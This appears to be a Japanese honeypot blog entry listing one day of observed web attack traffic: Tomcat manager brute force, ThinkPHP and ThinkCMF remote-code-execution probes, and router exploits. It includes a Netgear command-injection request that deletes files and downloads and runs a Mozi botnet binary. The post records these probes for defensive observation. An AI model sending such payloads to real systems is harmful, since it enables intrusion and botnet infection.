23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(298日目)

2020/01/08(水)

トータルは441件でした。

ハンティングログはありませんでした。

件数 概要 リクエス
362 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
42 アクセス GET /
5 調査 GET /script
3 ThinkPHPの脆弱性を狙った通信 POST /TP/public/index.php?s=captcha
3 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
3 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php
3 リモートデバッグの調査 GET /?XDEBUG_SESSION_START=phpstorm
2 Spring Data Commonsの脆弱性を狙った通信 POST /users?page=&size=5
2 Solrの調査 GET /solr/admin/info/system?wt=json
2 Yealinkの調査? GET /servlet?m=mod_listener&p=login&q=loginForm&jumpto=status
2 ThinkPHPの脆弱性を狙った通信 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP
2 ThinkCMFの脆弱性を狙った通信 GET /?a=fetch&content=die(@md5(HelloThinkCMF))
1 Linksys ルータの E シリーズの脆弱性を狙った通信 POST /tmUnblock.cgi
1 DVR/NVR/IPC のAPIにおける脆弱性を狙った通信 POST /editBlackAndWhiteList
1 調査 OPTIONS /
1 不正中継の調査 HEAD hxxp[:]//112.124.42.80:63435/
1 調査 HEAD /abc/web/About-Us.html
1 Netgearルータの脆弱性を狙った通信 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+hxxp[:]//192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1
1 Snom320の調査? GET /pv/snom320.htm
1 調査 GET /indexmobile.php
1 cPanelの調査? GET /cpanel
1 管理者情報の調査 GET /admin/config.php?password[0]=adhm&username=admin